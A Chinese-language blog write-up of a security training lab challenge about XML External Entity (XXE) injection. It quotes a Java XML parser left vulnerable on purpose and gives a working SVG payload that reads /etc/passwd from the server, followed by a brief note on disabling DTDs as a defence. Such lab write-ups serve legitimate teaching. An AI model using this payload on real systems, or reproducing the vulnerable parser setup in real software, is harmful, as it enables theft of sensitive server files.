[題目]

To prevent users from uploading malicious files as demonstrated in the previous challenge the developers are now saving the files to a database and rendering them into the page. Plus they also parse them to make sure they are valid XML. Your task is to get the avatar to display the contents of the /etc/passwd file.

Here's the code that parses the SVG:

public static Document parseXML(String xml) throws SAXException, IOException, ParserConfigurationException {

    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

    DocumentBuilder builder = factory.newDocumentBuilder();

    Document doc = builder.parse(new StringBufferInputStream(xml));

    doc.getDocumentElement().normalize();

    return doc;

}

[題目說明]

　　這一題透過程式檢查SVG檔案內容是否為XML格式來避免hacker上傳的是惡意程式碼檔，但是仍然有漏洞，就是hacker可透過XXE攻擊獲取敏感帳密檔案資訊，此題就是要再上傳的XML格式的SVG檔中埋下可以參考到server /etc/passwd檔的內容，然後上傳到server上。

[弱點提示]

    The software processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.

　　在XML中，我們可以指定XML參考的DTD來源以讓城市可以藉此來原來parse XML結構，也因為如此，試想我們把該DTD來源換作是Server 的敏感檔案，然後在XML中某個敘述把該參考到的DTD實體內容秀出，那我們就可以看到敏感檔案內容，這一題就是要我們上傳一個這樣子內容的XML格式的SVG檔，可以參考下面題目中對XXE補充的說明想想要如何設計要上傳的這樣一個檔案的內容：

About XXE

XML External Entity is exploited through DTDs (Document Type Definitions).

DTDs allow the creation of XML entities. XML Entities are variables that can be assigned a string value when the XML document gets processed.

The entity values could be configured with values external to the document, such as in the example below. This is where the XML External Entity name comes from.

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///var/www/myapp/welcome.txt">]>

<svg width="100" height="100">

<text x="10" y="20" fill="red">&xxe;</text>

</svg>

[解答]

1. 進入網頁:  https://insecureinctm.us-east-1.elasticbeanstalk.com/cwe611.jsp   
2. 登入demo account。
3. 準備XXE.svg檔，內容如下:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>

<svg width="100" height="100">

<text x="10" y="20" fill="red">&xxe;</text>

</svg>

5. 上傳XXE.svg檔。

6. 成功看到網頁秀出/etc/passwd檔案的敏感內容。

[安全原理]

　　XXE攻擊是利用XML可以參考外部檔案的方式去參考重要的檔案，然後在配合顯示出來在頁面上，防止XXE的方式可以停用DTD參考或是XML實體解析。

2019年2月25日星期一